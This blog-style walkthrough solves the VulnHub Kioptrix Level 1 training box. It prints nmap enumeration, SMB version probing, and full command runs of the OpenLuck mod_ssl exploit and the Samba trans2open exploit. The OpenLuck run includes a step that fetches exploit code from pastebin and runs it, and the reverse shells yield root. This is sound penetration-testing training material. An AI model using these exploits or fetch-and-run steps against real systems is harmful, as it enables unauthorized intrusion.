by Akcoren
This is a very old and quite popular beginner-friendly vulnerable box that is built for cybersecurity training. This can be considered an easy box but due to the very old versions of the services running on the box, installation and enumeration of the box might be hard for a beginner. This box can be downloaded from the following link
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
I used the VMWare version of the box. Before running the box, change the network option to NAT(or the one that your attack machine is on), and start hacking.
Overview
This overview shows the direct path to the solution of the vulnerable box Kioptrix Level 1 without giving the commands or tools used in the solution. There is an old Apache server running on the machine with a vulnerable mod_ssl version. There is also an old, vulnerable SMB share running on the machine. Both vulnerabilities allow us to do a RCE on the machine, which lead us to gain directly the root access. The key of the box is getting the versions of the services correct and finding an exploit that works as intended.
This machine is listed in the TJ Null’s OSCP preperation list.
Detailed Walkthrough
My IP: 192.168.10.143
Machine IP: 192.168.10.129
Machine Link: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Enumeration
Start with default nmap scan
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# nmap -T4 -p- -A 172.16.108.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-24 03:32 EDT
Nmap scan report for 172.16.108.129
Host is up (0.00035s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
| 1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_ 1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-04-24T14:32:58+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_http-title: 400 Bad Request
32768/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:C1:94:9E (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 7h00m04s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 172.16.108.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.37 secondsThis is a Linux machine. There are bunch of services running on the machine. Webserver, Samba file share, SSH and RPC. There are 2 different attack vectors in this machine. Web server with vulnerable mod_ssl version and vulnerable SMB server. At this point, the version of the SMB server is not clear, later in the article, more in depth enumeration for the smb share will be given.
OpenLuck Vulnerability
When you check the webpage served on the machine. You will see the default landing page.
Although, nmap clearly shows the running version of the Apache Webserver, 404 Not Found page leaks version information most of the time.
With a quick search of mod_ssl/2.8.4 on the web, we can find that Apache with mod_ssl < 2.8.7 version is vulnerable to OpenF*ck exploit. https://www.exploit-db.com/exploits/21671
A buffer-overflow vulnerability has been reported in some versions of the OpenSSL.
The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.
https://www.exploit-db.com/exploits/21671
This a very very old exploit. So old that tools to exploit it are even very old and unstable in the most of the modern systems. Compile and run version of the exploit can be found here: https://github.com/heltonWernik/OpenLuck/blob/master/OpenFuck.c
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1/open_fuck]
└─# gcc openluck.c -o openluck -lcrypto
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1/open_fuck]
└─# ./openluck 0x6b 192.168.10.129 443 -c 40
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt
--12:06:19-- https://pastebin.com/raw/C7v25Xr9
=> `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
0K ... @ 3.84 MB/s
12:06:19 (3.84 MB/s) - `ptrace-kmod.c' saved [4026]
ptrace-kmod.c:183:1: warning: no newline at end of file
[+] Attached to 2532
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
We directly get the root and it is very straight forward, no need for privilege escalation. Same exploit can be found in the searchsploit database too.
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1/open_fuck]
└─# searchsploit mod_ssl
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------SMB Vulnerability
Since this is a very famous box, if you search for even the other services and versions of them, you will see this box showing up. However, you can find the SMB server version running on the machine with just enumeration.
I used the crackmapexec, smbclient and enum4linux. None of them shows the version number. So there are 2 different things we can do to enumerate further, the auxiliary metasploit suggestions and/or a custom script.
msf6 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.10.129
RHOSTS => 192.168.10.129
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.10.129:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.10.129:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.10.129: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedIt is Samba 2.2.1a. We can get the information with the following custom script. More information on: https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb#smb-server-version.
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# ./smbver.sh 192.168.10.129
192.168.10.129:
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# UnixSamba 221aOr you can do it manually with terminal. Listen for smb communication with tcpdump.
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# tcpdump -s0 -n -i eth0 src 192.168.10.129 and port 139 -A -c 7
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytesStart a smb communication with smbclient.
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# smbclient -L 192.168.10.129
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Password for [WORKGROUP\root]:Then you will get packets which contain the version information.
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# tcpdump -s0 -n -i eth0 src 192.168.10.129 and port 139 -A -c 7
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
07:24:13.728707 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [S.], seq 1984819329, ack 168727235, win 5792, options [mss 1460,sackOK,TS val 4047323 ecr 1990541057,nop,wscale 0], length 0
E..<..@.@..[..
...
.....vM..
.......pR.........
.=..v.?.....
07:24:13.728969 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [.], ack 73, win 5792, options [nop,nop,TS val 4047323 ecr 1990541057], length 0
E..41Y@.@.s
..
...
.....vM..
..............
.=..v.?.
07:24:13.729453 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [P.], seq 1:5, ack 73, win 5792, options [nop,nop,TS val 4047323 ecr 1990541057], length 4
E..81Z@.@.s...
...
.....vM..
..............
.=..v.?.....
07:24:13.729970 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [P.], seq 5:94, ack 240, win 5792, options [nop,nop,TS val 4047323 ecr 1990541058], length 89
E...1[@.@.r...
...
.....vM..
........l.....
.=..v.?....U.SMBr...............................2.....................g..........,b....s.MYGROUP.
07:24:13.731014 IP 192.168.10.129.139 > 192.168.10.143.44728: Flags [P.], seq 94:165, ack 318, win 5792, options [nop,nop,TS val 4047324 ecr 1990541059], length 71
E..{1\@.@.r...
...
.....vM..
.......f......
.=..v.?....C.SMBs.....................l.d............Unix.Samba 2.2.1a.MYGROUP.So, we know this is Unix Samba 2.2.1a. With a quick search we can find this is vulnerable to Samba trans2open Overflow. This leads us to do RCE to get the root to the machine. https://www.exploit-db.com/exploits/16861
Search this on searchsploit database to get exploit source code.
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# searchsploit trans2
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054) | windows/dos/14607.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC) | windows/dos/12273.py
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | solaris_sparc/remote/16330.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) <<<===== | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No ResultsCompile it and run.
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# gcc trans2open.c -o trans2open
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# ./trans2open
Samba < 2.2.8 Remote Root exploit by Schizoprenic
Connect back method, Xnuxer-Labs, 2003.
Usage : ./trans2open <type> <victim> <your_ip>
Targets:
0 = Linux
1 = FreeBSD/NetBSD
2 = OpenBSD 3.0 and prior
3 = OpenBSD 3.2 - non-exec stack
┌──(root㉿kali)-[~/PREP/VULNHUB/kioptrixL1]
└─# ./trans2open 0 192.168.10.129 192.168.10.143
[+] Listen on port: 45295
[+] Connecting back to: [192.168.10.143:45295]
[+] Target: Linux
[+] Connected to [192.168.10.129:139]
[+] Please wait in seconds...!
[+] Yeah, I have a root ....!
------------------------------
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
rootWe can do the same with the metasploit framework. Strangely, Metasploit opens up a couple of sessions back to back but it works seamlessly.
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.10.129 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.143 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
View the full module info with the info, or info -d command.
msf6 exploit(linux/samba/trans2open) > run
[*] Started reverse TCP handler on 192.168.10.143:4444
[*] 192.168.10.129:139 - Trying return address 0xbffffdfc...
[*] 192.168.10.129:139 - Trying return address 0xbffffcfc...
[*] 192.168.10.129:139 - Trying return address 0xbffffbfc...
[*] 192.168.10.129:139 - Trying return address 0xbffffafc...
[*] 192.168.10.129:139 - Trying return address 0xbffff9fc...
[*] 192.168.10.129:139 - Trying return address 0xbffff8fc...
[*] 192.168.10.129:139 - Trying return address 0xbffff7fc...
[*] 192.168.10.129:139 - Trying return address 0xbffff6fc...
[*] Command shell session 9 opened (192.168.10.143:4444 -> 192.168.10.129:1039) at 2024-08-09 11:52:30 -0400
[*] Command shell session 10 opened (192.168.10.143:4444 -> 192.168.10.129:1040) at 2024-08-09 11:52:31 -0400
[*] Command shell session 11 opened (192.168.10.143:4444 -> 192.168.10.129:1041) at 2024-08-09 11:52:32 -0400
[*] Command shell session 12 opened (192.168.10.143:4444 -> 192.168.10.129:1042) at 2024-08-09 11:52:33 -0400
whoami
root
Conclusion & Comments
This is a very old machine which is in the TJNull’s OSCP preparation list. Machine runs two critically vulnerable service. Samba and Apache. Sadly, this walkthrough shows only the tools and exploits but not the in-depth analysis of the buffer overflow exploits which lead to the remote code execution. Metasploit and non-Metasploit solution for this machine is given in this walkthrough. Also a very neat trick to SMB enumeration is given. Moreover, since this is a very very old box with no current application in the modern days, it is still a very good exercise to solve it. Last but not least, I recommend this box to everyone who wants to be a ethical hacker.
Also, there is a wonderful TCM-Security video of this machine with very beginner friendly tips: https://youtu.be/sH4JCwjybGs?si=LiRM6LwQDwC3tPo0&t=2284.
Other Notable Resources
- TCM’s video: https://youtu.be/sH4JCwjybGs?si=LiRM6LwQDwC3tPo0&t=2284
- SMB Enumeration: https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb#smb-server-version
- SMB exploit: https://www.exploit-db.com/exploits/16861
- mod_ssl exploit: https://www.exploit-db.com/exploits/21671